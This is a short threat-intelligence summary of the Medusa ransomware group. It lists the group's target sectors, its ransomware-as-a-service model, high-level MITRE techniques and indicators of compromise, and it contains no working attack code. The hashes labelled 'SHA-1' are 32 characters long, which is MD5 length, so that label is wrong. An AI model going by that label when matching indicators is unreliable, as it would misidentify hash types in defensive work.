Threat Research

Medusa Ransomware: An Escalating Threat with a Strong Online Footprint

Securonix

Medusa ransomware group emerged in 2023 with a notable presence on both the surface web and the dark web, operating under a ransomware-as-a-service model. By 2024, they intensified attacks across healthcare, manufacturing, education, government, and finance sectors worldwide, using SQL injection for initial access, compromised RMM tools for persistence, PowerShell for execution, and a blend of dark web and OSINT-driven public relations tactics to leak data and engage victims. #Medusa #OSINTWithoutBorders

Keypoints

  • Emergence: Medusa ransomware group surfaced in 2023 with a notable online presence.
  • Attack Rate: In 2024, they are launching cyberattacks at an increasing rate, with a projected total of over 200 victims by year-end.
  • Target Sectors: Medusa targets healthcare, manufacturing, education, government, and finance sectors across multiple countries.
  • Ransomware-as-a-Service: Operates on a profit-sharing model with affiliates receiving a significant portion of ransom payments.
  • Online Presence: Combines dark web activities with a clear web identity, notably through a blog and social media platforms.
  • Attack Techniques: Utilizes SQL injection vulnerabilities for initial access and employs various methods for persistence and execution.
  • Defense Evasion & Public Relations: Implements sophisticated techniques to bypass anti-malware solutions and uses unusual public relations tactics, including OSINT-focused sites.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – “Exploits known vulnerabilities (e.g., SQL injection) to gain access to target systems.”
  • [T1547] Boot or Logon Autostart Execution – “Uses compromised RMM tools and modifies registry keys to maintain access.”
  • [T1059] Command and Scripting Interpreter – “Employs PowerShell scripts to execute commands and launch ransomware.”
  • [T1021] Remote Services – “Transfers malicious files using tools like bitsadmin and PSExec to move within the network.”
  • [T1562] Impair Defenses – “Utilizes techniques to disable security software and evade detection.”

Indicators of Compromise

  • [IP Addresses] observed indicators – 103.217.41.10, 194.28.50.70, and 6 more IPs
  • [SHA-256] malware file hashes – 4d4df87cf8d8551d836f67fbde4337863bac3ff6b5cb324675054ea023b12ab6, 657c0cce98d6e73e53b4001eeea51ed91fdcf3d47a18712b6ba9c66d59677980
  • [SHA-1] signatures – 5d5027305deb2cb2fd263fea9a6011af, 35dfc1fcb06fe31264a3fc7ff307e166

Read more: https://www.bitdefender.com/blog/businessinsights/medusa-ransomware-a-growing-threat-with-a-bold-online-presence/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint